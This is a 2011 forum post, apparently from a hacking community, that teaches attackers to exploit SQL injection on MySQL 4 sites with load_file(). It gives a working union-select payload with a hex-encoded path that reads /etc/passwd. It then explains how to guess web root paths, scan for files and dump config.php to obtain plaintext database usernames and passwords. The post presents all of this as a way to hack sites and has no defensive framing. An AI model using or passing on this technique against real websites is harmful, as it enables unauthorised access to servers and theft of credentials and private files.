denjacker Posted June 14, 2011 Report Posted June 14, 2011 Hey, I've decided to write this little tutorial to let people understand how load_file() works, because it seems everyone is scared here of mysql version 4.What is load_file() ?Syntax:load_file('/blah/blah.php')It is mysql global function, that reads and outputs the contents of the local file. It is the best way to hack sites that have MySQL version 4.This is just an example on UNIX system with php files, but if you find such vulnerability, you can do many things, like:- read .htpasswd files, read php files without execution.- bypass directory listing and htaccess- read unix files at /etc/, like /etc/passwd.And many many more...But not all sites vulnerable to load_file()... So it is kinda rare thing.First, when you found a vuln. to SQLi site, you should select largest column possible (this can be column, that shows a lot of text). Here is our visible column:Second, to execute load_file() in the URL, you need to hex the path, becaurse if we put load_file('/blah/blah.php') inside URL, it will filter special symbols and load_file() will not work.For example/etc/passwdin hex is:2f6574632f706173737764So you should execute it like that:php?id=1 union select load_file(0x2f6574632f706173737764)--(Notice: you should put "0x" before hex to let MySQL understand, that it's not normal input, but hexed code)After you executed, it should output the /etc/passwd file, where you can find your target directory's. As you see, on this screenshot it shows us directory for the site somesite.com:/home/webmaster/www/somesite.comIf it doesn't show path anywhere (even in mysql error message while SQL injecting, or somewhere else), you can guess it yourself. For example, if you SQLi the site "blah.net", then you can try /home/webmaster/www/blah.net, or /home/webmaster/public_html/blah.net, or /home/webmaster/http/blah etc..Third, once you found the site path, scan the site with Acunetix/other software to find filenames on this site. For example, it could be index.php or sensitive directorys, like /includes (it stores non-encrypted username and password for mysql users). In my example, I found directory /includes.The target file for mysql username and password is ussually config.php or config.inc.php or config.new.php. It depends, what kind of software site uses. If it uses wordpress or joomla or vbulletin, phpbb or some other crap, it would be too easy to find the right path for and name for this file (or any other files you want to dump Smile).Last step: just hex the path to file again, and execute:Hope this helps ! ChuckNorrisLove Quote
